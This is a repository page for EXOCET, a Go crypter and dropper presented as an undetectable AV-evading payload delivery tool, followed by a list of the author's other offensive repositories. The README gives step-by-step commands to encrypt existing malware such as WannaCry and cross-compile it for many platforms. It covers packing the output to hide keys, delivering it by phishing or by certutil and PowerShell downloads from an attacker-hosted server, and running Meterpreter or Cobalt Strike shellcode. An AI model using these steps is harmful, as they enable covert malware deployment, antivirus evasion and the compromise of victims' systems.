• Stars
    star
    726
  • Rank 62,009 (Top 2 %)
  • Language
    Go
  • Created about 4 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

EXOCET - AV-evading, undetectable, payload delivery tool

EXOCET - AV-evading, undetectable, payload delivery tool

Chang Tan
AWS Certified Cloud Practitioner and Solutions Architect Associate
[email protected]


Updated EXOCET Usage

Make sure you pack your payloads to avoid any leaks of the crypter's key and further frustrate malware analysts. A commercial top-of-the-line packer like Themida is NOT required. It would raise further suspicion without something like a code-signing certificate. Without code-signing certificate, on Windows systems, SmartScreen is automatically triggered. This is the rule for all potentially unwanted programs or "PUPs", meaning all malware payloads, beacons, geacons, remote access trojans, etc., requires a code signing certificate. Your money is better spent on buying a code-signing cert than some top-of-the-line packer.

go run exocet.go malware.exe outputmalware.go
env GOOS=windows GOARCH=amd64 build -ldflags "-s -w" outputmalware.go
upx --best outputmalware.exe

Then drop the payload on your target. Using something like a phishing email, link, or if you already have shell access, deliver it using something like hosting your own server locally python -m http.server 80' and then on the machine you are compromising, run as a powershell prompt iwr -Uri "http://yourip/outputmalware.exe" -OutFile "NotMalware.exe" or certutil.exe -urlcache -split -f http://yourip/outputmalware.exe and then execute with outputmalware.exe



EXOCET is superior to Metasploit's "Evasive Payloads" modules as EXOCET uses AES-256 in GCM Mode (Galois/Counter Mode). Metasploit's Evasion Payloads uses a easy to detect RC4 encryption. While RC4 can decrypt faster, AES-256 is much more difficult to ascertain the intent of the malware.

However, it is possible to use Metasploit to build a Evasive Payload, and then chain that with EXOCET. So EXOCET will decrypt via AES-256, and then the Metasploit Evasive Payload then decrypts itself from RC4.

Much like my previous project, DarkLordObama, this toolkit is designed to be a delivery/launch vehicle, much like Veil-Evasion does.

Dark Lord Obama Project

However, EXOCET is not limited to a single codebase or platforms that are running Python. EXOCET works on ALL supported platforms and architectures that Go supports.

Exocet Overview

EXOCET, is effectively a crypter-type malware dropper that can recycle easily detectable payloads like WannaCry, encrypt them using AES-GCM (Galois/Counter Mode), which is more secure than AES-CBC, and then create a dropper file for a majority of architectures and platforms out there.

Basically...

  1. It ingests dangerous malware that are now detectable by antivirus engines
  2. It then encrypts them and produces it's own Go file
  3. Then that Go file can be cross-compiled to 99% of known architectures
  4. Upon execution, the encrypted payload is written to the disk and immediately executed on the command line
  5. Alternatively, instead of a file-drop, it will execute the reconstitute shellcode in memory using amenzhinsky's go-memexec module github.com/amenzhinsky/go-memexec
  6. A custom shellcode executor is in the works, it takes ordinary C shellcode and after num-transform, it will run it by creating a new process after allocating the correct virtual address space and granting it RWX permissions on Windows

That means 32-bit, and 64-bit architectures, and it works on Linux, Windows, Macs, Unix, Android, iPhone, etc. You take, anything, and I mean ANYTHING, like the 1988 Morris Worm that nearly brought down the internet (which exploited a flaw in the fingerd listener daemon on UNIX), and make it a viable cyberweapon again.

EXOCET is written entirely in Go.

How to use

EXOCET, regardless of which binary you use to run it, requires Golang to work. By default, it generates a crypter .go file.

  1. Windows users: Install Go Here
  2. Linux users: run sudo apt-get update && sudo apt-get install -y golang
  3. You must install the EXOCET source files in golang go get github.com/tanc7/EXOCET-AV-Evasion
  4. Sub-requirements will also be downloaded and installed
  5. For Windows and Mac x64 Users, pre-compiled binaries are in the /bin folder

To run it

go run EXOCET.go detectablemalware.exe outputmalware.go

A key is automatically generated for you. The key is 64-characters long and is entirely composed of bash and cmd.exe shell pipe redirectors to confuse and disrupt brute-forcing attempts against the key by causing unpredictable, destructive behavior on the forensic analyst's device.

For 64-bit Windows Targets...

env GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.exe outputmalware.go

And out comes a outputmalware.exe file

For 64-bit MacOS Targets

env GOOS=darwin GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.macho outputmalware.go

For 64-bit Linux Targets

env GOOS=linux GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.elf outputmalware.go

See this reference on github for your parameters for other operating systems like Android Reference for Go Cross Compilation

Note that the key can still be found with the strings command, please use the upx-ucl command to pack binary to conceal the key.

Furthermore, there are prebuilt binaries that I have made, meaning you just have to run ./EXOCET or EXOCET-Windows.exe

Legal Information

I, Chang Tan, and the creators of the main module and submodules of Exocet and the packages it incorporates are NOT responsible for the misuse of this tool. This is merely a penetration testing tool. You are strictly prohibited from deploying Exocet output binaries against unauthorized protected systems or unauthorized protected government systems.

I am aware that threat actors of APT41 and the NSO Group have used and/or adopted code from this tool, particularly the go-memexec method. If I were to be approached by Federal Investigators regarding the misuse of this tool, I am not claiming responsibility.

This is the same stuff that happened to the developers of Mimikatz and PowerShell Empire (who deprecated their own development upon realization of its use among threat actors). The successors have picked up development of Empire, and there are free alternatives such as Covenant C2.

EXOCET live demo

<iframe width="560" height="315" src="https://github.com/tanc7/EXOCET-AV-Evasion/blob/master/media/exocetdemo.mp4" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

Reason for the name

On May 4th, 1982, during the Falklands War, a squadron of Argentinan Super Eterdards launched a French made Exocet missile at the HMS Sheffield. Despite the Royal Navy's attempts to stop the missile, one struck, sinking the Sheffield. That incident literally put Argentina on the map as a show of force against a global colonial power.

News Article of the sinking of the HMS Sheffield

Very much like how Onel de Guzman's actions with the ILOVEYOU virus put the Philippines on the map as a cyber threat.

ILOVEYOU Virus on Wikipedia

Incoming update, notes and ambitions

So this month, and the next month is going to be a busy month for me, and there will be delays in implementing these methods. But I am excited to get started on implementing new AV evasion techniques such as...

  1. Inline hooking
  2. Obfuscation by emulating BlackRota and the gobfuscate module
  3. Process hollowing
  4. Reflective DLL injection
  5. Remote process injection
  6. ThreadLocalStorage Callbacks
  7. Registration of Top-Level Exception Handlers
  8. Custom UPX packing

I am a very busy man, I have the following priorities and I would like to request some help, some pull requests to aid in the project. Since I have the following things to do

  1. A court appearance in late October
  2. National Cyber League
  3. Accounting and Finance Classes, Computer Science was NEVER my college major and in the following weeks I will have exams back-to-back
  4. Federal Supervised Release Conditions and the FBI trying to implicate me in new unproven crimes. I have dash camera videos I uploaded to the cloud to prove it that I am sending to my lawyers. I have documented multiple attacks against me, vandalism of my car, my house, filed police reports and counter reports and will be building my case to file a Federal lawsuit. One of the perpetrators, who ripped out my front bumper of my car, has been arrested.
  5. A private project involving interaction with the CoinGeckoAPI
  6. Running the cryptoscopeinitiative.org, a to-be-filed 501c3 Non-Profit Organization
  7. Teaching three online classes on Exploit Development

Upcoming update! Direct encrypted shellcode execution! (Implemented in test versions, not released yet)

I need a bit of help, because I successfully implemented CGO to execute encrypted shellcode but it is throwing memory access violations exit status 0xc0000005. It shouldn't be anything related to DEP (Data Execution Prevention) because the file CGOTest/working-template-shellcode-executor.go did run.

Problem Discovered

As it turns out, VirtualAlloc must be called from kernel32.dll and ntdll.dll to properly make the memory page where the shellcode lands, readable, writable, and executable, in other word, set the PAGE_EXECUTE_READWRITE to ON. Read the Note on Memory Access Violation Problem below.

Once I figure this out, CGO was a pain in the ass to implement, we can now create crypters that execute INLINE-ASSEMBLY. Which was considered a impossibility until now.

Note this requires Golang and the MinGW toolchain to be installed on Windows with you running and generating the shellcode on Windows. The reason why, is because CGO cannot be cross-compiled like our other EXOCET modules. To install the toolchain you need to go to https://www.msys2.org/ and follow the guide. Then you must add gcc to your environment variables in Windows

Step 1: Generate shellcode, this could be from msfvenom Meterpreter payloads, Cobalt Strike Beacons, or your own custom shellcode in C compatible format

Step 2: Copy only the bytes of the shellcode, excluding the quotes into a text file like sc.txt

Step 3: Your shellcode file should look like this. Raw shellcode

Step 4: Now run the command go run exocet-shellcode-exec.go sc.txt shellcodetest.go KEY

Step 5: You can attempt to run it but you'll run into memory access violation errors for some reason, which I am still working on

Note on Memory Access Violation Problem

Apparently, aside from the major limitations of CGO that prohibit or dramatically frustrates cross-compilation, the issue is that the shellcode we want to execute is landing in a section of memory (analyzed in WinDBG x64) that is not RWX. In other words, unless we write C code that explicitly allows execution in memory of the shellcode, it will always throw access violation errors.

The other method, that I observed other developers of rudimentary Go modules https://gist.github.com/mgeeky/bb0fd5652b234fbd1c7630d7e5c8542d, is that they use Go's Windows API to interact with ntdll.dll and kernel32.dll to call VirtualAlloc and specify areas of RWX memory pages. This method works better, but it seems that the shellcode must be in num-transformed format only for it to work.

I am still working on this you guys. I may combine multiple programming languages together to write a proper shellcode execution module

Note on Apple M1 Chips for precompiled binaries

Unfortunately I am running into errors for making a pre-compiled binary for MacBooks running the new M1 CPUs. It may be a issue with my Golang installation

β”Œβ”€β”€(rootπŸ’€kali)-[/opt/EXOCET-AV-Evasion]
└─# GOOS=darwin GOARCH=arm64 go build exocet.go 
# command-line-arguments
/usr/lib/go-1.15/pkg/tool/linux_amd64/link: running gcc failed: exit status 1
/tmp/go-link-477718799/go.o: file not recognized: file format not recognized
collect2: error: ld returned 1 exit status

Either way, you still require Golang to compile or cross-compile the malware to the platform you are targeting.

More Repositories

1

hacking-books

934
star
2

dark-lord-obama

AV-evading Pythonic Reverse Shell with Dynamic Adaption Capabilities
Python
64
star
3

PyMirai

The Mirai Botnet Source Code in Python
Python
33
star
4

Practical-SSL-TLS-Attacks

28
star
5

EasyPeasey

Metasploit/MSFVenom Payload Generator Stand Alone
Python
25
star
6

USBRubberDuckyTests

Warning, almost everything in this Repo is MALWARE. I am using this to experiment with various functionality for the Hak5 USB Rubber Ducky Keystroke Attack Device. And trying to determine which methods work.
PowerShell
23
star
7

Facerider

New and improved Man-In-The-Middle Framework fixes for Nethunter Phones and Tablets
Python
18
star
8

CustomTools

For Interview, OSCP proof of concept code during the course.
Python
16
star
9

Hyperjackers-Handbook

A comprehensive list of guides, handbooks, scripts, and fully featured apps required to initiate Hyper-Jacking Attacks (Theft of a Virtrual Machine)
Shell
10
star
10

ModMenuPoisoner

Tampers with Mods to Trigger False-Flag Antivirus Alerts against GTA V Mod Menus on VirusTotal, causing cheaters to disable their mods because of Windows Defender antivirus updates
Python
9
star
11

GladiatorCLI

Command Line Interface/Framework for Black Hat CTF Competitors
Python
8
star
12

HacktheBox_Deadly_Arthropod_Writeup

Python
8
star
13

Wifi-Attack-Auto-Loader-MANA-

Easily walks you through the Mana Evil AP Attack (While eliminating common mistakes). All promised features have been implemented (MANA + Aircrack Suite + Fern Wifi Cracker)
Python
5
star
14

ninjalooter

Design draft for a comprehensive, multi-platform, post-exploitation framework
Python
4
star
15

CrackHead

Easy, Simple Aircrack-Suite Replay Attacks
Python
4
star
16

OSED-Notes

Notes for the Offensive Security Windows User Mode Exploit Development Class
HTML
4
star
17

BulkHashcat-Windows-x64-

Windows compatible Python app that streamlines the operation of hashcat in cracking hashes and passwords.
Python
3
star
18

shellcode_generator

Python
3
star
19

proxyshell

Ongoing project. This framework simplifies the mundane tasks of lateral movement.
Python
3
star
20

analyst-punish

Proof of concept analyst punishing for red teaming payloads
C++
3
star
21

CUDA_Setup_Utility

STILL TESTING CUDA Setup Utility is a Python program designed to run in the TTY terminal (CTRL + ALT + F1 to F6) during the moment where the installation process breaks your display and you can only rely on your knowledge of terminal commands and access of the APT repos to continue.
Python
3
star
22

Research-Operations

These are heavily redacted documentation on my personally-run research projects about penetration testing
2
star
23

zh3r0CTFwriteups

From the perspective of a AWS Certified Cloud Solutions Architect Associate, Certified Cloud Practitioner, and OSCP prodigy
2
star
24

idiotproofedcommands

Batchfile
2
star
25

Violent-Python-Exercises

Python
2
star
26

Free-Pages-Doctrines-Assymetric-Cyber-Warfare

Free pages from my book.
2
star
27

Diaries

This is a ongoing diary preceding my FBI criminal indictment. Before the indictment and after the FBI raid on March 2018. I am taking this down because a ton of strange things have happened since the raid, including multiple hospitalizations against my will.
2
star
28

Exploit-Development-Tools

A bunch of my exploit development helper tools, collected in one place.
Python
2
star
29

Accounting-402-Notes

Shell
1
star
30

breakout

Breakout - Easy-mode HTTP tunnels + Transparent Proxifiers
Python
1
star
31

ACC_410_Tax_Calculator_Project

Python
1
star
32

Research_True_Nmap_Anonymity

Shell
1
star
33

captured_malware

Python
1
star
34

Gray-Hat-Python-Exercises

Python
1
star
35

Py_Vegas_Demo

NMap Auto Scriptor Standalone Installation, to be demonstrated at Python Vegas
Python
1
star
36

thmredteampayloads

Just coding exercises that I did in C, C++, and C# to complete the THM Red Team Path.
1
star
37

Linux-NordVPN-ConnectPlus

Improvements I made to the standard ovpn profile collection provided by NordVPN
Python
1
star
38

CodeAcademyNotes

HTML
1
star
39

contract9219

Python
1
star